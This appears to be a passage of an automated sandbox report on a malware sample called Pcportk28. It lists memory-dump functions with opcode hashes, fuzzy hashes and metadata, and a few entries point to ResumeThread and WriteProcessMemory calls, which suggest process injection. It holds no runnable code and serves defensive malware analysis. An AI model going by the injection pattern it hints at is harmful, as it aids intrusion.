                                                 Control-flow graph (rendered image): function at 35f358; calls ResumeThread in block 35f358-35f3ec. Node/edge list not reproduced in text.
                                                APIs
                                                • ResumeThread.KERNELBASE(?), ref: 0035F3D6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485175415.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_350000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID: 9lz
                                                • API String ID: 947044025-3545502388
                                                • Opcode ID: ea2c0d77cfbf59519998309e736c50bb50dce9c1dbae7609be30eb1fa2a2f554
                                                • Instruction ID: a06d3f4d4b1cb26656a6db2dfa0b6b2ba3a0223913ad9a2d06c64f36b9343522
                                                • Opcode Fuzzy Hash: ea2c0d77cfbf59519998309e736c50bb50dce9c1dbae7609be30eb1fa2a2f554
                                                • Instruction Fuzzy Hash: 8D31B9B4D012189FCF14CFA9E884AAEFBB4EF49314F24942AE814B7350DB35A905CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                 Control-flow graph (rendered image): function at 9e1cca; calls 35f6a0 (the WriteProcessMemory wrapper above). Node/edge list not reproduced in text.
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (
                                                • API String ID: 0-3887548279
                                                • Opcode ID: ace0784d74d0040fbdeccdc99abaf8942012a62caf46ebc55bebd7d56e9f0d08
                                                • Instruction ID: b3b75e072091c22392c482a5f245aae09d7dc351c0bd05094a29823a2ef6245f
                                                • Opcode Fuzzy Hash: ace0784d74d0040fbdeccdc99abaf8942012a62caf46ebc55bebd7d56e9f0d08
                                                • Instruction Fuzzy Hash: A3210774A022299FDB64DF64CD94BEDBBB6BF49304F1485D8D618A7292C7319E81CF01
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                 Control-flow graph (rendered image): function at 9e0048; calls 9e0634, 9e07a8, 9e0808, 9e0c19. Node/edge list not reproduced in text.
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 68a3fa55f2f2b27e49ac18b94f45ffc6ab6c54d4ef9572754c479066d9fd6942
                                                • Instruction ID: 1676909c09ba78bd5b88c4bde523575f6a4083bd7b59a3c3e1f7c2466a011b6c
                                                • Opcode Fuzzy Hash: 68a3fa55f2f2b27e49ac18b94f45ffc6ab6c54d4ef9572754c479066d9fd6942
                                                • Instruction Fuzzy Hash: 88C1F470D05218CFDB25DFA5D948BEEBBB5BB49305F1094A9D009A3290DBB45EC5CF14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 115f232583e6bdf943eccc4c4dc0d6883a8f3124eecf4e4d3671fe3f4e07c7ba
                                                • Instruction ID: 05d8bd1d279cf349789d637df9ebae4d37ac8dc538459d1aac1c69b2bedab18d
                                                • Opcode Fuzzy Hash: 115f232583e6bdf943eccc4c4dc0d6883a8f3124eecf4e4d3671fe3f4e07c7ba
                                                • Instruction Fuzzy Hash: 37B13570D05258CFEB25CF65D858BEEBBB0BF49305F1085A9D009A72A1DBB85E89CF14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9b976c8f7772b159292e129d2b6eca7af384b189b302741f02fcbd48be67b564
                                                • Instruction ID: 620a925054f43f0fa74cd67d8fea4b485fd0e8620928034ca62a5f42d8443f89
                                                • Opcode Fuzzy Hash: 9b976c8f7772b159292e129d2b6eca7af384b189b302741f02fcbd48be67b564
                                                • Instruction Fuzzy Hash: C56104B4E05259CFDB04CFEAC584AAEFBF5BF88304F248919D415A7256C7749C81DBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b113868a7364e2fd66a17b719930f11905dacd123016a3dc067582b854fa7222
                                                • Instruction ID: 5ce547f19e7d15694753318156783bc7a96a80e4eb9aace74a73f2bdb580724f
                                                • Opcode Fuzzy Hash: b113868a7364e2fd66a17b719930f11905dacd123016a3dc067582b854fa7222
                                                • Instruction Fuzzy Hash: 9D510270C05258CFDB25DFA5C988BEDBBB4BB49305F2054A9D009A7291DBB49A84CF14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fdc3f5c3bb0ce1bc42c59f1f94b7fd1b86747d27ebaa3d2e942be3d55a929711
                                                • Instruction ID: e9686c8f3cc14554e16256cf23217937a040c43f530420fa77af42d640125b88
                                                • Opcode Fuzzy Hash: fdc3f5c3bb0ce1bc42c59f1f94b7fd1b86747d27ebaa3d2e942be3d55a929711
                                                • Instruction Fuzzy Hash: 5251FE74D402698FDB25CF65CC84BE9B7B1BB89304F2086EAD509A6250EBB45EC5CF80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 29e6825350023322739b7bf0cb809f0c72e0a966175c69450378c16f4cb16ced
                                                • Instruction ID: a623f62b4616413ae7f56b6d69559dff09d8ed31fc3d4c3e8b32acd0261a2909
                                                • Opcode Fuzzy Hash: 29e6825350023322739b7bf0cb809f0c72e0a966175c69450378c16f4cb16ced
                                                • Instruction Fuzzy Hash: 8C31B074D052898FCB02CBA5C8546EDBFB1EF8A300F1885AAC441A7252D7759D86CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a7b0597fc4dfeb6999b2cec190f29c677f3ce32bfdb8764b0d43bd55a8d959c6
                                                • Instruction ID: 3a86e38e30d46748f05465990494237e6811d7f4a4b5243f9dfd26ea31892d50
                                                • Opcode Fuzzy Hash: a7b0597fc4dfeb6999b2cec190f29c677f3ce32bfdb8764b0d43bd55a8d959c6
                                                • Instruction Fuzzy Hash: 7A419B74E002688FCB65DF65CC887DDB7B2AB89305F1085EAD409AB395DB705E85CF41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485114296.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_17d000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a2e5168f7ca7254f22440c0c4d63e1348aed17fbd260f57d10ed84066775356c
                                                • Instruction ID: 26a7dd8497edb29fc52cc5d9d26fbe9e89193151b3f212dd40e872ee9bcf198c
                                                • Opcode Fuzzy Hash: a2e5168f7ca7254f22440c0c4d63e1348aed17fbd260f57d10ed84066775356c
                                                • Instruction Fuzzy Hash: 3121D071604208EFDB05DF14E980B26BBB5FF88318F24C5A9E9094B242C736D807CA61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485114296.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_17d000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a1933f6b0c49f01d345463a2d5484c55273cbe67df6ac9811f4e4fc86cb36182
                                                • Instruction ID: d1dc86d654a551b8031f5adc251305e8acc357ae6dac6351f91096ee64911e92
                                                • Opcode Fuzzy Hash: a1933f6b0c49f01d345463a2d5484c55273cbe67df6ac9811f4e4fc86cb36182
                                                • Instruction Fuzzy Hash: CE21D075604248EFDB14DF24E984B26BB75EF88314F34C5A9E90D4B246C736D847CA61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9e77bdab59393620f5ec5a82197e83ea787c3172c2ba3d7d875a34b3c249861c
                                                • Instruction ID: 2b37b4cfdac6ac89c7fe6ecabf7d83c4c7ac23a4f960d4c6c4cd275e749151f1
                                                • Opcode Fuzzy Hash: 9e77bdab59393620f5ec5a82197e83ea787c3172c2ba3d7d875a34b3c249861c
                                                • Instruction Fuzzy Hash: 9D319A74A00268CFDB21DF65CC887DDB7B2AB89305F1085EAD409AB394DB755E85CF40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5672fdd65105f3299dfd6e5f29ecccbf0b60f09b9bc2b6990f182160154ab919
                                                • Instruction ID: 882ac955173b731b819812ce841a8f3ccc96967ab9413ca1fa85d07f3c15aeeb
                                                • Opcode Fuzzy Hash: 5672fdd65105f3299dfd6e5f29ecccbf0b60f09b9bc2b6990f182160154ab919
                                                • Instruction Fuzzy Hash: 3A318B70D00668CFDB65DF69C888BDDB7B5AB89305F1085E9D009AB291D7349E85CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485114296.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_17d000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f9f5ddd475b2e5bf55c16974421a2f9a405ca4e1dcf75ea103203c9d10fa70e2
                                                • Instruction ID: fdcd420498e65962d79cf1409f43e11d6d84dbde1d0addc3af0b9fa0dcd4b571
                                                • Opcode Fuzzy Hash: f9f5ddd475b2e5bf55c16974421a2f9a405ca4e1dcf75ea103203c9d10fa70e2
                                                • Instruction Fuzzy Hash: AF218E755093848FCB12CF24D994715BF71EF46314F28C5EAD8498B2A7C33A980ACB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485114296.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_17d000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9312aeadfc63cb20e3ad457e85a1559f4d8aca9a68f7bd39dcaec918bac959ea
                                                • Instruction ID: 53a8dff7c0a7756142630accde25a21d3c7d3b645a101e04c6fcffc88b3725b0
                                                • Opcode Fuzzy Hash: 9312aeadfc63cb20e3ad457e85a1559f4d8aca9a68f7bd39dcaec918bac959ea
                                                • Instruction Fuzzy Hash: DB118B75944284DFCB12CF14E5C4B15BFB1FF84314F28C6A9D8494B656C33AD84ACB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6de1c2d46b08a72bc7a686e3fba4c3bb1be1f68215b24fb4a98b22c6846d7dac
                                                • Instruction ID: ba4415f474e53e694c9bd56756c68c2820b47ca262383af98736bf2783b8ff94
                                                • Opcode Fuzzy Hash: 6de1c2d46b08a72bc7a686e3fba4c3bb1be1f68215b24fb4a98b22c6846d7dac
                                                • Instruction Fuzzy Hash: 9D21CD70904228CFDB65DF64CC80BDDB7B5BB49305F5086E9D009AB291CB319E85DF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f1b6fa474b8f1ed9845dc824924fcda125ce00db39c8c97059ea0797c72ab3ab
                                                • Instruction ID: 15c1a367b899153f22656575ed33c9794e5dc62e23d46af9ec1011201581ab7f
                                                • Opcode Fuzzy Hash: f1b6fa474b8f1ed9845dc824924fcda125ce00db39c8c97059ea0797c72ab3ab
                                                • Instruction Fuzzy Hash: 0321D030800268CFDB25DF25D868BECB7B5AB5A301F1145E9D14EA72A1CB301EC4CF01
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 66bcf310cdb31fdd4349e144afdaf93806a469a6eb62cfbcc96c94febe546eff
                                                • Instruction ID: 65954ce19429f550dcf62bc92b618b313b5cb1c159b9307c9c38890738a44ea4
                                                • Opcode Fuzzy Hash: 66bcf310cdb31fdd4349e144afdaf93806a469a6eb62cfbcc96c94febe546eff
                                                • Instruction Fuzzy Hash: EB11BF359042688FCB25DF25D894BECB7B5AB5A301F1149E9D14EA72A1CB305ED4CF01
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485098504.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_16d000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f15fad26ddd7db83bb1e5fcb6ace5bd6e8cc89e55dca28dd060a6ae9f1f42cf5
                                                • Instruction ID: f537fd7bbc7b7b7864fe2936f9094807c865bf03acf7fb335c5f8ef7461284f6
                                                • Opcode Fuzzy Hash: f15fad26ddd7db83bb1e5fcb6ace5bd6e8cc89e55dca28dd060a6ae9f1f42cf5
                                                • Instruction Fuzzy Hash: D901A731A087409AE7108A25EC84B67FFD8EF51764F29C45EEE085A283D779D851C6B1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485098504.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_16d000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3fb5d3033248aceb7460194f96b5f966d7fb75167a22103fa56b91d0f893844a
                                                • Instruction ID: cab09e942393e07020292f90b03013f9918b599f4fe510c1e631c14836ff0b5a
                                                • Opcode Fuzzy Hash: 3fb5d3033248aceb7460194f96b5f966d7fb75167a22103fa56b91d0f893844a
                                                • Instruction Fuzzy Hash: 4DF06271504644AAEB108A15ECC8B63FFD8EF51764F28C55AED085B287D379DC44CBB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7a2e20e5bdb9c2c29d8bdf691210d4c1eb13bfc938adfd276ba4a2de8d0eec6a
                                                • Instruction ID: f4cf7f9e0ac99c0b65e3af720c8d7779b12626555ce5c40ebd1b6ea6fafc6d59
                                                • Opcode Fuzzy Hash: 7a2e20e5bdb9c2c29d8bdf691210d4c1eb13bfc938adfd276ba4a2de8d0eec6a
                                                • Instruction Fuzzy Hash: 96F0E730D01249DFDB44EFA9D9446AEBBF9FB89305F2086A9C459E3260E7709A81DB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4ef42d855840c241dafacc420e9c0ee42064e8956455730ebe5f495f613ac2e7
                                                • Instruction ID: 05b0af6e4a0b98f240dcf0ab8ca0e214c8db6dba9eb65c935a12089fcb1b03e9
                                                • Opcode Fuzzy Hash: 4ef42d855840c241dafacc420e9c0ee42064e8956455730ebe5f495f613ac2e7
                                                • Instruction Fuzzy Hash: FCF0F970D092489FCB45DBBA984439DBFB4AF85204F4484AAC448E3661E7749E86DB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4359a09441708c2f82927301017815acfa09b620f9b4fcde9be7927d25f8fb08
                                                • Instruction ID: bbcc65eab83a3adf19e8bd8f14d74a5ac1cbece90e241dbe7996f9a694701ad2
                                                • Opcode Fuzzy Hash: 4359a09441708c2f82927301017815acfa09b620f9b4fcde9be7927d25f8fb08
                                                • Instruction Fuzzy Hash: BC01EC34900209EFCB45DFE9C940AAEBBF9FF48305F14C969E81993291D7719E91EB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c17db3ea8520d4a8b60c11476c0090b4ca5a941dd462ba16bf8db2dc8c891bab
                                                • Instruction ID: 3ad893fb3cbde891fed2dc950319a5a4e54738fb0b10608c74b45d26ce9ba0d4
                                                • Opcode Fuzzy Hash: c17db3ea8520d4a8b60c11476c0090b4ca5a941dd462ba16bf8db2dc8c891bab
                                                • Instruction Fuzzy Hash: E801A434509385AFCB13CFA4CC406987FB5EF4A311F1485DAE894872A2C3359D52EB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 82a24c4f3e97705edc9ffa2a07f3d80cb96164ee5ff6f6cf288d3da73023f3a0
                                                • Instruction ID: 1699c9a1f03abfdbb3282514c839c2944b7a92cbc341850b5c3f15fecbea1146
                                                • Opcode Fuzzy Hash: 82a24c4f3e97705edc9ffa2a07f3d80cb96164ee5ff6f6cf288d3da73023f3a0
                                                • Instruction Fuzzy Hash: D4F03C70D052489FDB41DBEAD9446ADBFF4EF88300F1089AAC408A3252E3B459D0DB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bd4173c32ad508d5224dcfe21d8ec90c6de149c62c092dbf78530c9fd6a21edd
                                                • Instruction ID: 6ec3c6e2d2612ac36eb3f91d617bb607251dc918cb8033bea213831119a5655e
                                                • Opcode Fuzzy Hash: bd4173c32ad508d5224dcfe21d8ec90c6de149c62c092dbf78530c9fd6a21edd
                                                • Instruction Fuzzy Hash: CBF090309083859FC716CBB9D804699BFB4AF83315F2482D6C498931A2D7749DC1EB15
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 539ed910ad81b62d703d598d8f26c07a350c04aa44d209f81847403faef1ecda
                                                • Instruction ID: ef60990b1aaed2ec4b39aef9049433f27b65c448d760f1d63bca370add54c737
                                                • Opcode Fuzzy Hash: 539ed910ad81b62d703d598d8f26c07a350c04aa44d209f81847403faef1ecda
                                                • Instruction Fuzzy Hash: 19F0BE309082858FC705DBA9D80879ABBF9BF42305F1482A9C51857262E7349D82EA55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b36f08363a85af9c59f3ef76a70d8c962e3f9d5e9b04ace1813b88cd1bb5fab5
                                                • Instruction ID: f526bd2c19c856aabd13c4c11d4b90cc8a31bcfcb2fd9d9a3381efdaf1421808
                                                • Opcode Fuzzy Hash: b36f08363a85af9c59f3ef76a70d8c962e3f9d5e9b04ace1813b88cd1bb5fab5
                                                • Instruction Fuzzy Hash: F2F05E30D052498FCB04DFB4D8846EEBBB4FB8A300F204669C45AE3350E7704981DF40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3101d5ebca12bef3a316bdba89604588f69c746120b00aea4802408d48036724
                                                • Instruction ID: fd3b2ec501ee2fe2f306068648c9ec96d55825ba260f8028fab9999ffb535c9d
                                                • Opcode Fuzzy Hash: 3101d5ebca12bef3a316bdba89604588f69c746120b00aea4802408d48036724
                                                • Instruction Fuzzy Hash: 02F0F430A042089FCB44DBA9C9416ADFBF8EB49305F1488AA881893351E7709E829B40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 08651c3dbdadc542c754078b26dba3c7e56e0b8a7dcd934f4ea0c35f97c78ef6
                                                • Instruction ID: 6839366e41feda84b39df8a40bab0efaf1bdc4434c21e5c8e0a666aa431620df
                                                • Opcode Fuzzy Hash: 08651c3dbdadc542c754078b26dba3c7e56e0b8a7dcd934f4ea0c35f97c78ef6
                                                • Instruction Fuzzy Hash: 53F0B470A0C3858FC712CBA4C890298BBF8AB47314F2845DEC49887292D3359E82C741
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4dfba8e295964c36151396994e003d0be1aad966ae2b5561804a404bacb8d0d0
                                                • Instruction ID: eeba0d4647f7a25f81a2efe4a169165fbea8af577e786ab4793d8e39d9a548aa
                                                • Opcode Fuzzy Hash: 4dfba8e295964c36151396994e003d0be1aad966ae2b5561804a404bacb8d0d0
                                                • Instruction Fuzzy Hash: 1DF01575908218DFDB21CFA0DC84BDCBBB1BB08300F204599D109AB2A1CB341ED0DF04
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485175415.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_350000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 14d3505da3d5661de48f73eab17580ea50529337923c733f875cf58cdfa30d33
                                                • Instruction ID: 83e8eff27949a5169a6940ca9392cbf9c0c385c26050f94611a2581d3f795f93
                                                • Opcode Fuzzy Hash: 14d3505da3d5661de48f73eab17580ea50529337923c733f875cf58cdfa30d33
                                                • Instruction Fuzzy Hash: D1518C71D0C7858FCB1ACFB898509ABBFB4BB43305F1188ABC894D7152D3348989C762
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485175415.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_350000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 68aab40ee36258345bbe66d1f4506729ba5abc6b3177c1d785a59cf9b8db7086
                                                • Instruction ID: e7e9520f77cd80fdaf168f299bd5ec0e4c1986e50171c2f10eef046a48fc7c86
                                                • Opcode Fuzzy Hash: 68aab40ee36258345bbe66d1f4506729ba5abc6b3177c1d785a59cf9b8db7086
                                                • Instruction Fuzzy Hash: 0D513F709042098FD748DFBAE891B9EBBF2EFC8304F10D539D105AB664DB7059899B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485175415.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_350000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 67dcf6bde0d95e3fd19369b69566994231f3b16a424c5a8fadc97c460e50295d
                                                • Instruction ID: d585f0b780c6edc6a160ef64c22a0457f4be6756a21d8265ccaa752a3a4ef03f
                                                • Opcode Fuzzy Hash: 67dcf6bde0d95e3fd19369b69566994231f3b16a424c5a8fadc97c460e50295d
                                                • Instruction Fuzzy Hash: 69516E709042498FD748DFBAE891B9E7BF2EFC8304F10C579D115AB668DB70598ACB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

